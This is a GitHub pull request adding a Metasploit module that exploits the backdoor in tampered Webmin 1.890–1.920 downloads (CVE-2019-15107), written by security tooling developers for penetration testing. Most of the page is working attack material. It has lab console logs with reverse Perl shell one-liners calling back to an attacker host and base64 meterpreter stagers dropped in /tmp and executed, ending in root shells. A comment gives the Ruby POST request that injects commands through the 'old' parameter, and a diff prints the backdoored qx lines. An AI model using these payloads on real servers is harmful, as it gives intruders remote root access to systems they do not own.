Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add Webmin password_change.cgi backdoor exploit #12219

Merged
merged 11 commits into from Aug 23, 2019

Conversation

@wvu-r7
Copy link
Contributor

commented Aug 21, 2019

Background

Please read http://www.webmin.com/exploit.html for full context.

Backdoored Webmin 1.890

msf5 exploit(unix/webapp/webmin_backdoor) > run

[*] Started reverse TCP handler on 172.28.128.1:4444
[*] Webmin 1.890 detected
[+] Webmin 1.890 is a supported target
[+] Webmin executed a benign check command
[*] Configuring Automatic (Unix In-Memory) target
[*] Sending cmd/unix/reverse_perl command payload
[*] Generated command payload: perl -MIO -e '$p=fork;exit,if($p);foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(PeerAddr,"172.28.128.1:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);while(<>){if($_=~ /(.*)/){system $1;}};'
[*] Command shell session 1 opened (172.28.128.1:4444 -> 172.28.128.5:58374) at 2019-08-21 16:49:24 -0500

id
uid=0(root) gid=0(root) groups=0(root)
uname -a
Linux ubuntu-xenial 4.4.0-141-generic #167-Ubuntu SMP Wed Dec 5 10:40:15 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
^Z
Background session 1? [y/N]  y
msf5 exploit(unix/webapp/webmin_backdoor) > set target 1
target => 1
msf5 exploit(unix/webapp/webmin_backdoor) > run

[*] Started reverse TCP handler on 172.28.128.1:4444
[*] Webmin 1.890 detected
[+] Webmin 1.890 is a supported target
[+] Webmin executed a benign check command
[*] Configuring Automatic (Linux Dropper) target
[*] Sending linux/x64/meterpreter/reverse_tcp command stager
[*] Generated command stager: ["echo -n f0VMRgIBAQAAAAAAAAAAAAIAPgABAAAAeABAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAEAAOAABAAAAAAAAAAEAAAAHAAAAAAAAAAAAAAAAAEAAAAAAAAAAQAAAAAAA+QAAAAAAAAB6AQAAAAAAAAAQAAAAAAAASDH/aglYmbYQSInWTTHJaiJBWrIHDwVIhcB4UmoKQVlWUGopWJlqAl9qAV4PBUiFwHg7SJdIuQIAEVysHIABUUiJ5moQWmoqWA8FWUiFwHklSf/JdBhXaiNYagBqBUiJ50gx9g8FWVlfSIXAecdqPFhqAV8PBV5aDwVIhcB47//m>>'/tmp/FgFBP.b64' ; ((which base64 >&2 && base64 -d -) || (which base64 >&2 && base64 --decode -) || (which openssl >&2 && openssl enc -d -A -base64 -in /dev/stdin) || (which python >&2 && python -c 'import sys, base64; print base64.standard_b64decode(sys.stdin.read());') || (which perl >&2 && perl -MMIME::Base64 -ne 'print decode_base64($_)')) 2> /dev/null > '/tmp/tDGmH' < '/tmp/FgFBP.b64' ; chmod +x '/tmp/tDGmH' ; '/tmp/tDGmH' ; rm -f '/tmp/tDGmH' ; rm -f '/tmp/FgFBP.b64'"]
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3021284 bytes) to 172.28.128.5
[*] Meterpreter session 2 opened (172.28.128.1:4444 -> 172.28.128.5:58376) at 2019-08-21 16:49:33 -0500
[*] Command Stager progress - 100.00% done (819/819 bytes)

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer     : 10.0.2.15
OS           : Ubuntu 16.04 (Linux 4.4.0-141-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >

Backdoored Webmin 1.920 (passwd_mode=2)

msf5 exploit(unix/webapp/webmin_backdoor) > run

[*] Started reverse TCP handler on 172.28.128.1:4444
[*] Webmin 1.920 detected
[+] Webmin 1.920 is a supported target
[+] Webmin executed a benign check command
[*] Configuring Automatic (Unix In-Memory) target
[*] Sending cmd/unix/reverse_perl command payload
[*] Generated command payload: perl -MIO -e '$p=fork;exit,if($p);foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(PeerAddr,"172.28.128.1:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);while(<>){if($_=~ /(.*)/){system $1;}};'
[*] Command shell session 1 opened (172.28.128.1:4444 -> 172.28.128.5:58370) at 2019-08-21 16:57:04 -0500

id
uid=0(root) gid=0(root) groups=0(root)
uname -a
Linux ubuntu-xenial 4.4.0-141-generic #167-Ubuntu SMP Wed Dec 5 10:40:15 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
^Z
Background session 1? [y/N]  y
msf5 exploit(unix/webapp/webmin_backdoor) > set target 1
target => 1
msf5 exploit(unix/webapp/webmin_backdoor) > run

[*] Started reverse TCP handler on 172.28.128.1:4444
[*] Webmin 1.920 detected
[+] Webmin 1.920 is a supported target
[+] Webmin executed a benign check command
[*] Configuring Automatic (Linux Dropper) target
[*] Sending linux/x64/meterpreter/reverse_tcp command stager
[*] Generated command stager: ["echo -n f0VMRgIBAQAAAAAAAAAAAAIAPgABAAAAeABAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAEAAOAABAAAAAAAAAAEAAAAHAAAAAAAAAAAAAAAAAEAAAAAAAAAAQAAAAAAA+QAAAAAAAAB6AQAAAAAAAAAQAAAAAAAASDH/aglYmbYQSInWTTHJaiJBWrIHDwVIhcB4UmoKQVlWUGopWJlqAl9qAV4PBUiFwHg7SJdIuQIAEVysHIABUUiJ5moQWmoqWA8FWUiFwHklSf/JdBhXaiNYagBqBUiJ50gx9g8FWVlfSIXAecdqPFhqAV8PBV5aDwVIhcB47//m>>'/tmp/kuwKL.b64' ; ((which base64 >&2 && base64 -d -) || (which base64 >&2 && base64 --decode -) || (which openssl >&2 && openssl enc -d -A -base64 -in /dev/stdin) || (which python >&2 && python -c 'import sys, base64; print base64.standard_b64decode(sys.stdin.read());') || (which perl >&2 && perl -MMIME::Base64 -ne 'print decode_base64($_)')) 2> /dev/null > '/tmp/gNRPw' < '/tmp/kuwKL.b64' ; chmod +x '/tmp/gNRPw' ; '/tmp/gNRPw' ; rm -f '/tmp/gNRPw' ; rm -f '/tmp/kuwKL.b64'"]
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3021284 bytes) to 172.28.128.5
[*] Meterpreter session 2 opened (172.28.128.1:4444 -> 172.28.128.5:58372) at 2019-08-21 16:57:12 -0500
[*] Command Stager progress - 100.00% done (819/819 bytes)

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer     : 10.0.2.15
OS           : Ubuntu 16.04 (Linux 4.4.0-141-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >

Backdoored Webmin 1.920 (passwd_mode=0)

msf5 exploit(unix/webapp/webmin_backdoor) > run

[*] Started reverse TCP handler on 172.28.128.1:4444
[*] Webmin 1.920 detected
[+] Webmin 1.920 is a supported target
[-] Expired password changing disabled
[-] Exploit aborted due to failure: not-vulnerable: Set ForceExploit to override
[*] Exploit completed, but no session was created.
msf5 exploit(unix/webapp/webmin_backdoor) >

Fixed Webmin 1.930

msf5 exploit(unix/webapp/webmin_backdoor) > run

[*] Started reverse TCP handler on 172.28.128.1:4444
[*] Webmin 1.930 detected
[-] Webmin 1.930 is not a supported target
[-] Exploit aborted due to failure: not-vulnerable: Set ForceExploit to override
[*] Exploit completed, but no session was created.
msf5 exploit(unix/webapp/webmin_backdoor) >
@jrobles-r7

This comment has been minimized.

Copy link
Contributor

commented Aug 21, 2019

The POST parameters that are needed for the Webmin v1.900 are old, new1, and new2.
The command injection is in old. new1 and new2 must be equal.

@mekhalleh

This comment has been minimized.

Copy link

commented Aug 21, 2019

Hello, this work fine on v.1.9000

def send_command(cmd)
    new_password = Rex::Text.rand_text_alpha(8)
    return(
      send_request_cgi({
        'method' => 'POST',
        'cookie' => "redirect=1; testing=1; sid=x; sessiontest=1",
        'ctype'  => 'application/x-www-form-urlencoded',
        'uri' => normalize_uri(target_uri.path, 'password_change.cgi'),
        'headers' => {
          'Referer' => "#{peer}/session_login.cgi"
        },
        'data' => "user=#{Rex::Text.rand_text_alpha(8)}&pam=&expired=2&old=#{Rex::Text.rand_text_alpha(8)} | #{cmd}&new1=#{new_password}&new2=#{new_password}&Submit"
      })
    )
end
@jrobles-r7

This comment has been minimized.

Copy link
Contributor

commented Aug 21, 2019

While testing for v1.900 I found that user, pam, and expired can be removed from the POST parameters.
Also the | is not needed in the old parameter. The command injection can be placed in old without a |.

@wvu-r7

This comment has been minimized.

Copy link
Contributor Author

commented Aug 21, 2019

Since the alleged command injection is actually the qx operator and not an unsafe open(), the fact that | works is incidental, since it can be used as a command separator.

Here's the diff I was working off:

wvu@kharak:~/Downloads$ diff3 webmin-1.{890,930,920}/password_change.cgi
====2
1:1c
3:1c
  #!/usr/bin/perl
2:1c
  #!/usr/local/bin/perl
====1
1:12c
  $in{'expired'} eq '' || die $text{'password_expired'},qx/$in{'expired'}/;
2:12c
3:12c
  $miniserv{'passwd_mode'} == 2 || die "Password changing is not enabled!";
====3
1:40c
2:40c
  	$enc eq $wuser->{'pass'} || &pass_error($text{'password_eold'});
3:40c
  	$enc eq $wuser->{'pass'} || &pass_error($text{'password_eold'},qx/$in{'old'}/);
====3
1:200c
2:200c
  # Show ok page
3:200c

wvu@kharak:~/Downloads$

I'll document it shortly.

wvu-r7 added 6 commits Aug 21, 2019

@wvu-r7 wvu-r7 force-pushed the wvu-r7:feature/webmin branch from c69cc30 to 6b8c0bc Aug 21, 2019

@wvu-r7 wvu-r7 removed the needs-docs label Aug 21, 2019

@wvu-r7 wvu-r7 changed the title [WIP] Add Webmin password_change.cgi backdoor exploit Add Webmin password_change.cgi backdoor exploit Aug 21, 2019

@wvu-r7 wvu-r7 removed the delayed label Aug 21, 2019

@wvu-r7 wvu-r7 marked this pull request as ready for review Aug 21, 2019

Simplify request by combining POST parameters
There's no need to discriminate between versions. Send 'em all.

@wvu-r7 wvu-r7 force-pushed the wvu-r7:feature/webmin branch from 98d63df to dff2aed Aug 21, 2019

@wvu-r7

This comment has been minimized.

Copy link
Contributor Author

commented Aug 21, 2019

Targeting is automatic now. I don't care enough to readd the version-specific targets, and there's ForceExploit anyway. I've got other stuff to do, so I'm done here. Thanks, everyone!

@jrobles-r7

This comment has been minimized.

Copy link
Contributor

commented Aug 23, 2019

Tested against Webmin v1.900

msf5 exploit(unix/webapp/webmin_backdoor) > exploit

[*] Started reverse TCP handler on 172.22.222.136:4444 
[*] Configuring Automatic (Unix In-Memory) target
[*] Sending cmd/unix/reverse_perl command payload
[*] Command shell session 1 opened (172.22.222.136:4444 -> 172.22.222.112:48536) at 2019-08-23 08:50:08 -0500

whoami
root
uname -a
Linux ubuntu 5.0.0-25-generic #26~18.04.1-Ubuntu SMP Thu Aug 1 13:51:02 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
^C
Abort session 1? [y/N]  y
""

[*] 172.22.222.112 - Command shell session 1 closed.  Reason: User exit
msf5 exploit(unix/webapp/webmin_backdoor) > set verbose true
verbose => true
msf5 exploit(unix/webapp/webmin_backdoor) > check

[*] Webmin 1.900 detected
[+] Webmin 1.900 is a supported target
[+] Webmin executed a benign check command
[+] 172.22.222.112:10000 - The target is vulnerable.
msf5 exploit(unix/webapp/webmin_backdoor) > 
jrobles-r7 added a commit that referenced this pull request Aug 23, 2019

@jrobles-r7 jrobles-r7 merged commit dff2aed into rapid7:master Aug 23, 2019

3 checks passed

Metasploit Automation - Sanity Test Execution Successfully completed all tests.
Details
Metasploit Automation - Test Execution Successfully completed all tests.
Details
continuous-integration/travis-ci/pr The Travis CI build passed
Details
msjenkins-r7 added a commit that referenced this pull request Aug 23, 2019
@jrobles-r7

This comment has been minimized.

Copy link
Contributor

commented Aug 23, 2019

Release Notes

A module that exploits CVE-2019-15107 is now available in Metasploit framework. It exploits a backdoor in SourceForge downloads of Webmin versions 1.890 through 1.920. Please read http://www.webmin.com/exploit.html for full context.

@wvu-r7 wvu-r7 deleted the wvu-r7:feature/webmin branch Aug 23, 2019

@tdoan-r7 tdoan-r7 added the rn-modules label Sep 5, 2019

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
6 participants
You can’t perform that action at this time.